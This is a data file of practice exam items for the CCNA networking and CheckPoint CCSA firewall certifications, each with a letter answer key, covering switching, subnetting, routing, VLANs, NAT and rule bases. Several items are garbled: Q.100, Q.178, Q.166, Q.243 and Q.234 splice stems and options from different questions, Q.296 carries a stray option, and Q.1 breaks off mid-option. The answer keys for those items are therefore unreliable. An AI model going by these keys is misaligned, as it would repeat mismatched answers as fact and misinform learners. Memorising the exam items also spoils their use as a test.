B	#CCNA Q. 218	Which statement about switched and routed data flow is correct?	^A: Switches create a single collision domain and a single broadcast domain. Routers provide separate broadcast domains.	^B: Switches create separate collision domains but a single broadcast domain. Routers provide separate broadcast domains.	^C: Switches create a single collision domain and a separate broadcast domain. Router provides a separate broadcast domain as well.	^D: Switches create separate collision domains and separate broadcast domains. Routers provide separate collision domains.
D	#CCNA Q. 172	Which statement about Ethernet switches is true?	^A: Symmetric switching allows connection between ports of unlike bandwidth and does not require memory buffering.	^B: Memory buffering is used to prevent a bottleneck when ports of different bandwidth are connected on a symmetric switch.	^C: The latency can be reduced if the switch utilizes the store and forward method of switching. Store and forward is better for error detection.	^D: The cut-through method of switching is faster because the switch forwards the packet to the destination as soon as it reads the destination address.
D	#CCNA Q. 201	Which statement about the flow control function of TCP is True? 	^A: TCP makes no effort to check for lost or duplicate data packets. 	^B: The application layer must sequence data packets when using TCP. 	^C: TCP controls the flow of UDP data through negative acknowledgements NAK. 	^D: TCP is a connection-oriented protocol that acknowledges receipt of data packets and is considered reliable						
B	#CCNA Q. 99	Which statement about Ethernet networks is true?	^A: The advantage of a full duplex is the ability to transmit data over Mbase2 cable.	^B: Full duplex Ethernet requires a point-to-point connection when only two nodes are present.	^C: Ethernet switches can use full duplex mode to connect multiple nodes to a single port of a switch.	^D: Half duplex is a cut through packet processing method that is very fast with little error correction, full duplex is store and forward method that is slower but has better error correction.
A	#CCNA Q. 296	Hosts in the Sales Department are unable to access a new server at the remote office. Consider the IP addressing scheme in the accompanying graphic to determine the problem.	^A: The default gateway of the workstations in the sales department is incorrect.	^B: The subnet mask of the workstations in the sales department is incorrect.	^C: The default gateway of the server at the Remote Office is incorrect.	^D: The host address of the server at the Remote Office is invalid.	^E: The serial 0 interface on the Home Office router and the serial 1 interface on the Remote Office router are not on the same subnetwork.					^D: Router RIP 
E	#CCNA Q. 51	Which of the following are true?	^A: The default is to send debug output to the console screen.	"^B: To view debug output from a telnet session, the ""terminal monitor"" command must be used."	"^C: If the ""logging buffered"" command is used, the debug output would be sent to RAM and can be viewed with the ""show log"" command."	"^D: If the ""no console logging"" command were configured, output would be sent to a telnet session."	^E: All of the above.
C	#CCNA Q. 180	When you enter router passwords during the setup dialogue, what is the difference between the enable and enable secret passwords?	^A: The enable password is encrypted.	^B: The enable secret password uses IPSec password authentication.	^C: The enable secret password cannot be seen as clear text when viewing the configuration.	^D: The enable secret password acts as a backup in case the enable password is compromised.
C	#CCNA Q. 3	When setting up Frame Relay for point-to-point subinterfaces, which of the following must not be	^A: The Frame Relay encapsulation on the physical interface	^B: The local DLCI on each subinterface	^C: An IP address on the physical interface	^D: The subinterface type as point-to-point		
B	#CCNA Q. 272	What does IGRP use to determine the best path to a destination?	^A: The highest metric value.	^B: The lowest composite metric value.	^C: The lowest hop-count and delay.	^D: The highest bandwidth and reliability	^E: The lowest administrative distance.	
B	#CCNA Q. 36	A routing table contains static, RIP, and IGRP routes for the same destination network. Which route would normally be used to forward data?	^A: The IGRP route.	^B: The static route.	^C: The RIP route.	^D: All three will load balance.
B	#CCNA Q. 155	When you use the Cisco IOS command show configuration on a router, which part of the output shows the specific configured IP addresses and subnet masks?	^A: The IP host table	^B: The interfaces output	^C: Each section of the output	^D: Each section of the output	^E: The global configuration statements	^F: The section under the autonomous system number
D	#CCNA Q. 117	Which statement is true when a broadcast is sent in an Ethernet/802.3 LAN?	^A: The IP subnet used is 255.255.255.0	^B: The IP address used is 255.255.255.255	^C: The MAC address used is 00-00-00-00-00-00	^D: The MAC address used is FF-FF-FF-FF-FF-FF.
A,B,C	#CCNA Q. 200	Which three pieces of CDP information about neighboring routers are displayed on your console terminal? (Choose three)	^A: The neighboring router's host name	^B: The neighboring router's hardware platform	^C: Up to one address for each protocol supported	^D: Up to two addresses for each protocol supported	^E: As many addresses as are configured for each protocol supported.
C	#CCNA Q. 24	From the DOS command prompt, you are able to ping a router but are unable to telnet it. What is the most likely cause of the problem?	^A: The PC has a bad network interface card.	^B: The IP address of the router is on a different subnet.	^C: No password has been set on the router vty lines.	^D: The default gateway is not set on the PC.	^E: The IP address of the workstation is incorrect.
C	#CCNA Q. 262	A new host has been connected to a workgroup switch. Although its Layer 3 configuration is correct, the host is unable to access the server resources on its network segment. What is the likely cause of this problem?	^A: The router lacks a routing table entry for the new host.	^B: The host switch port is assigned to the incorrect VLAN.	^C: The host MAC address is incorrectly configured.	^D: A VTP instance for the new host has not been installed.
B	#CCNA Q. 78	What is not a characteristic of a network segment on a switch?	^A: The segment has its own collision domain.	^B: The segment can translate from one media to a different media.	^C: All devices in the segment are part of the same broadcast domain.	^D: One device per segment can currently send frames to the switch.
D	#CCNA Q. 123	Switching methods include cut-through, store-and-forward, and a modified version of the first two methods. Which statement about switching methods is true?	^A: The store-and-forward method has low latency.	^B: The cut through method and switching has high latency.	^C: The modified version holds the packet in memory until 50% of the packet reaches the switch.	^D: The modified version holds the packet in memory until the data portion of the packet reaches the switch.
A,B,D	#CCNA Q. 18	You need to add a new VLAN, named ACCOUNTS, to your switched network. Which of the following are true regarding configuration of this VLAN? (Choose three)	^A: The VLAN must be created.	^B: The VLAN must be named.	^C: An IP address must be configured for the ACCOUNTS VLAN.	^D: The desired ports must be added to the new VLAN.	^E: The VLAN must be added to the STP domain.
A,D	#CCNA Q. 270	You have a Class B network address with a subnet mask of 255.255.255.0. Which of the following statements are true regarding the resulting network? (Choose two.)	^A: There are 254 usable hosts per subnet.	^B: There is one usable network.	^C: There are 255 usable hosts per subnet.	^D: There are 254 usable subnets.	^E: There are 30 usable subnets.	^F: There are 62 usable hosts per subnet.
B	#CCNA Q. 309	What is the purpose of DLCIs in Frame Relay?	^A: They determine the Frame Relay encapsulation type.	^B: They identify the logical circuit between a local router and a Frame Relay WAN switch.	^C: They represent the keepalives used to maintain the PVC in an active state.	^D: They represent the physical address of the router attached to a Frame Relay network.
B,C,E	#CCNA Q. 257	Which of the following are benefits of VLANs? (Choose three)	^A: They increase the size of collision domains.	^B: They allow logical grouping of users by function.	^C: They enhance network security.	^D: They increase the size of broadcast domains while decreasing the number of broadcast domains.	^E: They increase the number of broadcast domains while decreasing their size.	^F: They simplify switch administration.
D	#CCNA Q. 250	What is the purpose of ISL and 802.1Q frame tagging?	^A: They provide best path determination.	^B: They allow the exchange of filtering tables.	^C: They specify different implementation of the Spanning-Tree Protocol.	^D: They provide interswitch VLAN communication.
D,E	#CCNA Q. 152	What are two functions of ICMP protocol? (Choose Two)	^A: To map IP addresses to Ethernet addresses	^B: To map common names to network addresses	^C: To forward SNMP alerts to management consoles	^D: To generate an echo reply in response to a ping test	^E: To send a host or port unreachable message from a router to the source of an undeliverable packet
B	#CCNA Q. 128	What is a key use of a device hardware address?	^A: To obtain a vendor code/serial number from the user.	^B: To transmit a frame from one interface to another interface	^C: To transmit a packet from one local device to another local device.	^D: To transmit data from one local device to remote device across Internet.	^E: To contain logical information about a device to use an end-to-end transmission.	
C	#CCNA Q. 251	What is the purpose of Spanning-Tree in a switched LAN?	^A: To provide a mechanism for network monitoring in switched environments.	^B: To prevent routing loops in networks with redundant paths.	^C: To prevent routing switching loops in networks with redundant switched paths.	^D: To manage the addition, deletion, and naming of VLANs across multiple switches.	^E: To segment a network into multiple collision domains.
B,E	#CCNA Q. 294	Which of the following are reasons to use a bridge to segment a network? (Choose two.)	^A: To reduce broadcasts within collision domains.	^B: To reduce collisions within broadcast domains.	^C: To increase the number of broadcast domains.	^D: To increase the broadcasts within collision domains.	^E: To increase the number of collision domains.	^F: To increase the efficiency of routing.
A,C	#CCNA Q. 225 	What are two purposes for using switches? (Choose two) 	^A: To reduce collisions 	^B: To increase collisions 	^C: To increase the number of collision domains 	^D: To decrease the number of collision domains 	^E: To decrease the number of broadcast domains 	
A,C	#CCNA Q. 115	What are two purposes of segmenting a network with a bridge? (Choose two)	^A: To reduce collisions.	^B: To increase collisions.	^C: To add collision domains.	^D: To reduce collision domains.	^E: To have more broadcast domains.	
A,C,D,F	#CCNA Q. 281	What are possible causes of LAN traffic congestion? (Choose four.)	^A: Too many hosts in a broadcast domain.	^B: Full Duplex operation.	^C: Broadcast storms.	^D: Multicasting.	^E: Segmentation.	^F: Low bandwidth.
C	#CCNA Q. 29	If the window size is changed from 3000 to 4000 during the data transfer stage of a TCP session, what can a sending host do?	^A: Transmit 3000 bytes before waiting for an acknowledgement.	^B: Transmit 4000 packets before waiting for an acknowledgement.	^C: Transmit 4000 bytes before waiting for an acknowledgement.	^D: Transmit 4000 segments before waiting for an acknowledgement.	^E: Transmit 3000 frames before waiting for an acknowledgement.
A	#CCNA Q. 203	The ICMP (referred to in RFC 1700) is implemented by all TCP/IP hosts? 	^A: TRUE 	^B: FALSE 				
A	#CCNA Q. 204 	IPX traffic using different encapsulation types can go over the same datalink. 	^A: TRUE 	^B: FALSE 				
D	#CCNA Q. 182	"How do you get help on a command after you have received a ""% INCOMPLETE COMMAND"" response from a switch CLI?"	"^A: Type ""history"" to review the prompt before the error."	^B: Enter a question mark to display all console commands	"^C: Type ""help"" followed by the command to see the command parameter"	^D: Re enter the command followed by question mark to view key words
A,B	#CCNA Q. 209 	In which two modes can the ICMP ping command be used? (Choose two) 	^A: User 	^B: Privileged 	^C: Global Configuration 	^D: Interface Configuration 		
A	#CCNA Q. 280	Question on PPP authentication. We have two Cisco routers with the hostnames Router1 and Router2. Router1 uses username Router2 and password PassRouter1. How would you set the username and password on Router2 for PPP authentication between Router1 and Router2?	^A: Username Router1 password PassRouter1	^B: Username Router2 password PassRouter1	^C: Username Router1 password PassRouter2	^D: Username Router2 password PassRouter2		
A	#CCNA Q. 68	A router on one side of a PPP link uses the host name RTR1 and the password CORP1-PWD. Which configuration line on RTR1 enables the connection between RTR1 and another router named RTR2?	^A: Username RTR2 password CORP1-PWD	^B: Username RTR1 password CORP1-PWD	^C: Username RTR2 password CORP2-PWD	^D: Username RTR1 password CORP2-PWD
B	#CCNA Q. 220	What was the key reason the International Organization for Standardization released the OSI model?	^A: Users could access network server faster.	^B: Different vendors' networks could work with each other.	^C: The industry could create a standard for how computers work.	^D: The network administrator could increase the overall speed of their network.
D	#CCNA Q. 124	Which technology do catalyst switches use to resolve topology loops and ensure data flows properly through a single network path?	^A: Virtual LANs.	^B: Frame filtering.	^C: Cut through switching.	^D: Spanning tree protocol.
C,D,E,F	#CCNA Q. 121	What are 4 ways network management can be simplified by using the virtual LANs (VLANs)? (Choose four)	^A: VLANs allow you to implement multiple layers switching easily.	^B: VLAN can group several broadcasts domains into multiple logical subnets.	^C: It is no longer necessary to install cables to move a user from a new network to another.	^D: Network adds, moves and changes are achieved by configuring a port into a VLAN.	^E: A group of users needing high security can be put into a VLAN so that no users outside the VLANs can communicate with them.	^F: As a logical grouping of users, VLANs can be considered independent from their physical or geographic locations.
A,E,F	#CCNA Q. 61	In which three situations is a hold-down timer reset? (Choose three)	^A: When the hold-down timer expires.	^B: When infinity is finally defined as some maximum number.	^C: When the router exchanges update summaries at area borders.	^D: When the router detects faulty LSPs propagating through the internetwork.	^E: When another update is received indicating a new route with a better metric.	^F: When another update is received indicating the original route to the network has been restored.	^G: When the router receives a processing task proportional to the number of links in the internetwork.
A	#CCNA Q. 77	Which statement is true?	^A: While bridges are used to segment networks they will not isolate broadcast or multicast packets.	^B: A bridge looks at every packet within its network segment and works like a hub, rebroadcasting the packet if the destination is within its network segment.	^C: A bridge maintains a table of the IP addresses of the hosts within its network segment and forwards the packet directly to the destination based upon the IP address.	^D: Bridge resets the hop count by keeping all packets within the network segment; only packets addressed to its specific destination host outside the network segment are allowed to pass through the bridge.
A	#CCNA Q. 187	Which statement about half-duplex Ethernet operation is true?	^A: With half duplex transmission frames feed into a single cable in one direction at a time.	^B: Half duplex transmission between stations is achieved by using point-to-point Ethernet and fast Ethernet connection.	^C: Half duplex transmission between stations is achieved by using point to multi point Ethernet and fast Ethernet connection.	^D: Half duplex Ethernet technology provides a transmit circuit connection wired directly to the receiver circuit at the other end of the connection.
C	#CCNA Q. 297	Company ABC has just added an employee workstation to its network. The employee is unable to connect to the server at IP address 192.168.10.98/27. Identify the incorrectly configured network parameter.	^A: workstation IP address.	^B: workstation subnet mask.	^C: workstation default gateway.	^D: router interface E0 IP address.				
D	#CCNA Q. 278	Which WAN technology was designed to work over traditional phone lines and provide small offices and users with higher speed digital dial-up service?	^A: frame relay	^B: x.25	^C: ATM	^D: ISDN
B,F	#CCNA Q. 34	Given the following routing table entry, which of the following are used by default in the calculation of the number 1200? (Choose two.) 172.16.0.0 [100/1200] via 192.168.16.3, 00:00:55, Ethernet1	^A: MTU	^B: bandwidth	^C: administrative distance	^D: hop count	^F: delay			
A	#CCNA Q. 73	Which statement about the specialized IP addresses shown in the EXHIBIT is true? EXHIBIT: 10.0.0.0 to 10.255.255.255	172.16.0.0 to 172.31.255.255	192.168.0.0 to 192.168.255.255	^A: They are private IP addresses.	^B: They can not be leased with DHCP.	^C: They are allocated for VOL PVOLP.	^D: They represent IP classless addresses.	^E: They are used by the inter NIC for administration.	
C	#CCNA Q. 136	Given the following IP address from the Class B address range: 172.35.21.12 Your network plan requires no more than 126 hosts on a subnet that includes this address. When you configure the IP address in Cisco IOS software, which value should you use as the subnet mask?	^A: 255.255.0.0	^B: 255.255.128.0	^C: 255.255.255.128	^D: 255.255.255.252				
A	#CCNA Q. 197	Company XYZ has an employee that works out of the home. The employee runs big client-server applications and must quickly transfer large files. The company wants the best cost/benefit on this connection. What would be the most practical solution?	^A: An ISDN basic rate interface (BRI) connection to the user's home.	^B: A dedicated T1 connection to the user's home.	^C: A dedicated Frame Relay connection to the user's home.	^D: A standard 28.8 analogue dial up connection to the user's home
D	#CCNA Q. 193	Given the following criteria for granting access from a remote site to your LAN : restrict access on interface E0	E0=128.12.22.55	Deny access to telnet, FTP	All other types of operations.	Which line should come last in configuring your access list?	^A: Access-List 101	^B: Access-List 101 deny E0 telnet FTP	^C: Access list 101 allow all except FTP telnet	^D: Access list 101 permit IP 0.0.0.0 255.255.255.255 any
E	#CCNA Q. 163	Which line from a show spantree 1 command output indicates that Virtual LAN1 (VLAN1) is functioning properly?	^A: Root mode is fast Ethernet 0/26.	^B: Port Ethernet 0/1 of VLAN is forwarding.	^C: Designated port in Ethernet 0/1 path cost 10.	^D: Designated root has priority 0, address 0000.588fb600	^E: VLAN1 is executing the IEEE compatible spanning tree protocol.
B	#CCNA Q. 221 	Each department has its own file server and the company has an enterprise server that is shared by all  departments. What does a network administrator use to provide a secure separation between the management and sales department? 	^A: Bridge between management and sites. 	^B: Routers to provide the most secure segmentation. 	^C: A hub to provide the ease of management and a satisfactory alternative for the network security. 	^D: An Ethernet switch to secure separation through programming the access list of each port of the switch. 				
D	#CCNA Q. 153	Novell IPX network addresses have two configurable parts. The network administrator specifies the IPX  network number. How is the node number determined?	^A: It is the serial number of the given device.	^B: It is assigned as a lease by Novell DHCP.	^C: It is also set by the network administrator.	^D: It is usually the MAC address of one interface.	^E: It is downloaded by NetWare Core Protocol (NCP).			
B	#CCNA Q. 30	Users on network 192.168.69.0/28 are complaining that they cannot access the corporate intranet server at www.inhouse:com. In troubleshooting this problem, you find that you are able to telnet a workstation on this network to the internal webserver via its IP address. What is the likely cause of this problem? Other divisions in the company use applications that require less than 2 Mbps bandwidth of the enterprise server	^A: TCP/IP failure	^B: DNS failure	^C: FTP failure					
C	#CCNA Q. 100	On a network design project you determine that a new testing application requires multiple hosts. These hosts must be capable of sharing data between each host and an enterprise server at 10 Mbps bandwidth. system image that is run in Flash?	^A: Copy flash tftp	What is your economical recommendation?	^A: That the existing 10BaseT hub be replaced with 100BaseT hub to improve overall performance.	^B: That a router can separate the testing application from the rest of the network thus allowing the	testing application more bandwidth.	^C: That the switch be installed so that enterprise server can be provided a 100 Mbps port and each	of the testing application hosts can be given dedicated 10 Mbps ports.	
A	#CCNA Q. 178	Which command should you use to configure a router so that it can become a TFTP host for router	transmission session on the other device are successful. What is the default that you must enter to	suspend your Telnet session and return to the original router?	^B: Config tftp server	^C: Write network <router name>	^D: Tftp-server system <filename>	^E: Setup server tftp <systemname>	
E	#CCNA Q. 166	While you are preparing the initial configuration of your router and enable IP you find that you need to use a telnet session to check for a network address parameter. Your telnet logging and your virtual	Which layer of the protocol stack is the network administrator using for this operation? 	^A: application 	^A: Suspend	^B: The command exit	^C: CTRL - ESC followed by x	^D: CTRL - ALT - DEL followed by ESC	^E: CTRL- Shift-6 followed by x
A	#CCNA Q. 243 	A network administrator is verifying the configuration of a newly installed host by establishing an ftp  connection to a remote server. 	Which of the following are required to allow remote management of the switch over IP? (Choose two.) 	^A: The Frame Relay encapsulation on the physical interface. 	^B: presentation 	^C: session 	^D: transport 	^E: data link 	^F: internet 
C	#CCNA Q. 234 	You are configuring a new catalyst switch that you want to manage remotely from workstations on other network segment within your enterprise. you configure for 5 bits of subnetting when you configure for this in the Cisco IOS software. Which subnet mask should you use? 	^B: The local DLCI on each subinterface. 	^C: An IP address on the physical interface. 	^D: The subinterface type as point-to-point 				
D	#CCNA Q. 219 	Given the following IP address from the class C address range 192.168.21.12 your network plan needs  addresses for twenty-eight small offices. Each office uses its own subnet. The network designs specify that 	^A: 255.255.0.28 	^B: 255.255.255.0 	^C: 255.255.255.28 	^D: 255.255.255.248 	^E: 255.255.255.252 		
4ad1.021f.2cfe.8322	#CCNA Q. 39:	A host with a MAC address of 021f.2cfe.8322 is to be inserted into IPX network 4ad1. Enter the IPX address for this host.							
255.255.255.224	#CCNA Q. 264	A small enterprise has a class C network license The enterprise requires five usable subnets, each capable of accommodating at least 18 hosts. Enter the appropriate subnet mask below.							
255.255.255.224	#CCNA Q. 311	A small enterprise has class C network license The enterprise requires 5 usable subnets, each capable of accommodating at least 18 hosts. Enter the appropriate subnet mask below.								
router rip	#CCNA Q. 232	Enter the command to start IP, RIP version1 routing on a Cisco router? 							
DECIMAL:170 HEXADECIMAL:AA	#CCNA Q.315	What is the decimal and hexadecimal equivalent of the binary number 10101010?							
D	#CCNA Q. 1:	Your Ethernet network, 172.30.1.0, shuts down. Which update message is seen in your router's debug ip rip output regarding that network?^A: subnet 172.30.1.0,metric 0	^B: subnet 172.30.1.0, metric 1	^C: subnet 172.30.1.0, metric 15	^D: subnet 172.30.1.0, metric			 				
A 	#CCSA Q1.  The VPN1 NG User Interface consists of which of the following elements? ^A.  Security Policy Editor, Visual Policy Editor and Object tree view.   ^B.  Management Server and VPN1 Module. ^C.  Visual Policy Editor, Object Tree view and inspection Module. ^D.  Security Policy Server, System GUI and Module Log Viewer. ^E.  VPN1 Module, Inspection Module and Security Server. 
A 	#CCSA Q3.  As a VPN1 administrator, you have an undistributed range of IP addresses for which you want to perform address translation. You can simplify your efforts through the use of ADDRESS RANGE. ^A.  True ^B.  False 
D 	#CCSA Q5. You are working with multiple firewalls that have extensive Rule Bases. To simplify administration task, which of the following should you choose to do? ^A.  Create Network range objects that restrict all applicable rules to only certain networks. ^B.  Run separate GUI clients for external and internal firewalls. ^C.  Eliminate all possible contradictory rules such as stealth and clean-up rules. ^D.  Save a different Rule Base for each remote firewall. ^E.  None of the above. 
B 	#CCSA Q6.  Currently, the Accounting Department is FTP-ing a file in the bank. Which Log Viewer Module would show you the activity occurring at the present time? ^A.  Security Log. ^B.  Active Connections Log. ^C.  Accounting Log. ^D.  Administrative Log. ^E.  None of the above. 
A 	#CCSA Q7.  With Blocking Scope default settings, a selected connection is terminated: ^A.  And all further attempts to establish a connection from the same source IP address to the same destination IP address and port will be blocked. ^B.  But all further attempts to establish connections from this specific source IP address will be authenticated before being denied. ^C.  And all further attempts to establish connections to this specific destination IP address will be denied. ^D.  And all further attempts to establish a connection from the same source IP address to the firewall's IP address will be blocked. ^E.  Both A and D. 
C 	#CCSA Q11. Changes made to the Security Policy do not take effect on the Enforcement Module until the administrator performs which of the following actions? ^A.  Saves the policy. ^B.  Verifies the policy. ^C.  Installs the policy. ^D.  Stops firewall services on the Enforcement Module. ^E.  Stops firewall services on the Management module. 
A 	#CCSA Q13. The fw fetch command performs the following function: ^A.  Attempts to fetch the policy from the Management Server. ^B.  Fetches users from the Management server. ^C.  Produces an output screen of the Rule Base. ^D.  Fetches the logs. ^E.  Fetches the systems status. 
E 	#CCSA Q14. Inclement weather and a UPS-failure cause a firewall to reboot. ^  Earlier that day a tornado destroyed the building where the firewall's Management Module was located. ^  The Management Module was not recovered and has not been replaced. ^  Based on the scenario, which of the following statements is FALSE? ^A.  The firewall will continue to enforce the last rule base installed. ^B.  The firewall will log locally. ^C.  The firewall will fetch the last installed policy from local host and install it. ^D.  Communication between the firewall and the replacement Management Module must be established before the replacement Management Module can install a policy on the firewall. ^E.  Because the firewall cannot contact the Management Module, no policy will be installed. 
C 	#CCSA Q15. When configuring Anti1 NG on the firewall interfaces, all of the following are valid address choices except: ^A.  Network defined by Interface IP and Net Mask. ^B.  Not Defined. ^C.  Security Policy Installed. ^D.  Specific ^E.  None of the above. 
C 	#CCSA Q17.  Assume that you are working on a Windows NT operating system. What is the default expiration for a Dynamic NAT connection NOT showing any UDP activity? ^A.  30 Seconds.   ^B.  60 Seconds.    ^C.  40 Seconds.   ^D.  600 Seconds.  ^E.  3000 Seconds. 
B 	#CCSA Q18. Assume there has been no change made to default policy properties. ^  To allow a telnet connection into your network, you must create two rules. ^  - One to allow the initial Telnet connection in. ^  - One to allow the destination machine to send information back to the client. ^A.  True ^B.  False 
E 	#CCSA Q19. In Windows NT to force log entries other than the default directory. ^A.  You must use the cpconfig command.   ^B.  Change the fwlog environment variable. ^C.  Modify the registry. ^D.  Change the directory in log viewer. ^E.  Use the fw log switch command. 
A 	#CCSA Q20. For most installations, the Clean-Up rule should be the last rule in Rule Base. ^A.  True ^B.  False 
B 	#CCSA Q21.  What complements are necessary for VPNmail, passing through the firewall, for macro viruses? ^A.  UFP and OPSEC-certified scanning product. ^B.  CVP and OPSEC-certified virus scanning product. ^C.  UFP and CVP. ^D.  UFP, CVP and OPSEC-certified content filter. ^E.  None of the above, VPN1 NG scans for macro viruses by default. 
C 	#CCSA Q22. Why would you want to verify a Security Policy before installation? ^A.  To install Security Policy cleanly. ^B.  To check up the enforcement-point firewall for errors. ^C.  To identify conflicting rules in your Security Policy. ^D.  To compress the Rule Base for faster installation ^E.  There is no benefit verifying a Security Policy before installing it. 
B 	#CCSA Q23. To completely setup Static NAT, you ONLY have to select Add Automatic Address Translation rules on the NAT tab, and specify a public NAT IP address. ^A.  True ^B.  False 
B 	#CCSA Q24. If you configure the Minutes interval for a firewall in the User Authentication session timeout box, as shown below on the Authentication Tab of the Workstations properties window, users of one time password must re-authenticate for each request during this time period. ^A.  True ^B.  False 
D 	#CCSA Q25. What does a status of Untrusted tell you? ^A.  A VPN1 NG firewall module has been compromised. ^B.  A gateway cannot be reached. ^C.  A module is installed and responding to status checks, but the status is problematic. ^D.  A gateway is connected, but the management module is not the master of the module installed on the gateway. ^E.  None of the above. 
D 	#CCSA Q29.  How do you recover communications between your management module and enforcement module if you lock yourself out via a rule policy that is configured incorrectly? ^A.  Cp delete all all. ^B.  Cp pause all all.  ^C.  Cp stop all all.    ^D.  Cp unload all all. ^E.  Cp push all all. 
C 	#CCSA Q30. You have set up a firewall and management module on one NT box and a remote module on a  different location. ^  You receive only sporadic logs from the local firewall and only and control message from remote firewall. ^  All rules on both firewalls are logging and you know the traffic is flowing through the firewall using these rules. ^  All the firewall related services are running and you are using NAT and you receive few logs from the local firewall. ^  What actions from the choices below would you perform to find out why you cannot see logs? ^A.  Make sure there is no masters file in SFWDIR/conf on the remote module. ^B.  Make sure there is no masters file in SFWDIR/conf on the local NT box. ^C.  See if you can do a fwfetch from the module. ^D.  Run the fw logexport n from the command line prompt on the remote module. ^E.  Use pulist.exe from the Windows NT resource kit. 
B 	#CCSA Q31. As a firewall administrator you encounter the following error message: "Authentication for command failed." ^  What is the most logical reasoning for this type of error message? ^A.  The Rule Base has been corrupted. ^B.  The kernel cannot communicate with the management module. ^C.  The administrator does not have the ability to push the policy. ^D.  Remote encryption keys cannot be fetched. ^E.  Client authentication has failed. 
A 	#CCSA Q32. Your customer has created a rule so that every time a user wants to go to the Internet, that user must be authenticated. ^  Firewall load is a concern for the customer. ^  Which authentication method does  not result in any additional connections to the firewall? ^A.  Session ^B.  User ^C.  Client ^D.  Connection ^E.  None of the above. 
D 	#CCSA Q33. What variable is used to extend the interval of the Timeout in a NAT to prevent a hidden UDP connection from losing its port? ^A.  Fwx_udp_todefaultextend.  ^B.  Fwx_udp_expdefaultextend. ^C.  Fwx_udp_todefaultext ^D.  Fwx_udp_timeout. ^E.  Fwx_udp_expiration. 
D 	#CCSA Q34. To hide data fields in the log viewer: ^A.  Select Hide from the Log Viewer menu. ^B.  Right-click anywhere in a column of the Log Viewer GUI and select Show Details. ^C.  Right-click anywhere in the column of the Log Viewer GUI and select Disable. ^D.  Right-click anywhere in the column of the Log Viewer GUI and select Hide. ^E.  Select Hide from the Log Viewer tool bar. 
D 	#CCSA Q35. You are following the procedure to setup user authentication for TELNET to prompt for a distinct destination. ^   This allows the firewall to simulate a TELNET Proxy. ^  After you defined the user on the Firewall and use VPN1 Authentication, you would: ^A.  Stop the Firewall. ^B.  Restart the Firewall. ^C.  Start the Policy Editor and go to Manage service, and edit TELNET service. ^D.  Ensure that the Authentication method is enabled in the firewall object. ^E.  Ensure that there are no existing rules already allowing TELNET. 
E 	#CCSA Q37. What is the software package through which all Check Point products use infrastructure services? ^A.  Cpstart/cpstop. ^B.  Check Point Registry. ^C.  CPD ^D.  Watch Dog for critical services. ^E.  SVN Foundation. 
A 	#CCSA Q38. Choose the BEST response to finish this statement.     ^   A Firewall: ^A.  Prevents unauthorized access to or from a secured network.    ^B.  Prevents unauthorized access to or from an unsecured network. ^C.  Prevents authorized access to or from an Intranet. ^D.  Prevents authorized access to or from an Internet. ^E.  Prevents macro viruses from infecting the network. 
E 	#CCSA Q39. Where is the external if file located in VPN1/Firewall-1 NG? ^A.  FWDIR conf directory. ^B.  Database directory. ^C.  State directory. ^D.  Temp Directory. ^E.  Not used in VPN1/Firewall-1 NG. 
E 	#CCSA Q40.  Which log viewer mode allows you to actually see the contents of the files HTTP-ed by the corporation's Chief Executive Officer? ^A.  Security Log. ^B.  Active Connections Log. ^C.  Accounting Log. ^D.  Administrative Log. ^E.  None of the above. 
E 	#CCSA Q41.  When you select the alert radio button on the topology tab of the interface properties window: ^A.  The action specified in the Action element of the Rule Base is taken. ^B.  The action specified in the Anti-Spoofing Alert field in the Global properties window is taken. ^C.  The action specified in the Pop up Alert Command in the Global properties window is taken.  ^D.  Both A and B. ^E.  Both B and C. 
D 	#CCSA Q42. You are the firewall administrator with one management server managing one firewall. The system status displays a computer icon with a '!' symbol in the status column. ^  Which of the following is the most likely cause? ^A.  The destination object has been defined as external. ^B.  The Rule Base is unable to resolve the IP address. ^C.  The firewall has been halted. ^D.  The firewall is unprotected, no security policy is loaded. ^E.  Nothing is wrong. 
B 	#CCSA Q43.  System Administrators use session authentication when they want users to: ^A.  Authenticate each time they use a supported service. ^B.  Authenticate all services. ^C.  Use only TELNET, FTP, RLOGIN, and HTTP services. ^D.  Authenticate once, and then be able to use any service until logging off. ^E.  Both B and D 
B 	#CCSA Q44.  Your customer has created a rule so that every time a user wants to go to Internet, that user must be authenticated. ^  The customer requires an authentication scheme that provides transparency for the user and granular control for the administrator. ^  User must also be able to log in from any location. ^  Based on this information, which authentication scheme meets the customer's needs? ^A.  Session ^B.  User     ^C.  Client   ^D.  Dual     ^E.  Reverse 
B 	#CCSA Q45.  Implementing Dynamic NAT would enable an internal machine behind the firewall to act as an FTP Server for external clients. ^A.  True ^B.  False 
E 	#CCSA Q46. The Enforcement Module (part of the VPN1 Module): ^A.  Examines all communications according to an Enterprise Security Policy. ^B.  Is installed on a host enforcement point. ^C.  Can provide authentication and Content Security features at the application level. ^D.  Is usually installed on a multi-homed machine. ^E.  All of the above. 
C 	#CCSA Q47. In most cases when you are building the Rule Base you should place the Stealth Rule above all other rules except: ^A.  Clean up rules. ^B.  Implicit Rules. ^C.  Client Authentication Rules. ^D.  Pseudo Rules. ^E.  Default Rules. 
A 	#CCSA Q48.  If you change the inspection order of any of the implied rules under the Security Policy Setup, does it change the order in which the rules are enforced? ^A.  True ^B.  False 
A 	#CCSA Q49. The fw fetch command allows an administrator to specify which Security Policy a remote enforcement module retrieves. ^A.  True ^B.  False 
B 	#CCSA Q50.  You can edit VPE objects before they are actualized (translated from virtual network objects to real). ^A.  True ^B.  False. 
E 	#CCSA Q51.  Stateful inspection is a firewall technology introduced in Checkpoint VPN1 software. It is designed to meet which of the following security requirements? ^  1. Scan information from all layers in the packet. ^  2. Save state information derived from previous communications, such as the outgoing Port command of an FTP session, so that incoming data communication can be verified against it. ^  3. Allow state information derived from other applications access through the firewall for authorized services only, such as previously authenticated users. ^  4. Evaluate and manipulate flexible expressions based on communication and application derived state information. ^A.  1, 2, 3   ^B.  1, 3, 4    ^C.  1, 2, 4   ^D.  2, 3, 4    ^E.  1, 2, 3, 4 
A 	#CCSA Q52. If the security policy editor or system status GUI is open, you can open the log viewer GUI from the window menu. ^A.  True ^B.  False 
D 	#CCSA Q53. NAT can NOT be configured on which of the objects? ^A.  Hosts ^B.  Gateways ^C.  Networks ^D.  Users ^E.  Routers 
C 	#CCSA Q54. Your customer has created a rule so that every time a user wants to go to Internet, that user must be authenticated. ^  Which is the best method of authentication for users who must use specific computers for Internet access? ^A.  Session ^B.  User ^C.  Client ^D.  Connection ^E.  None of the above. 
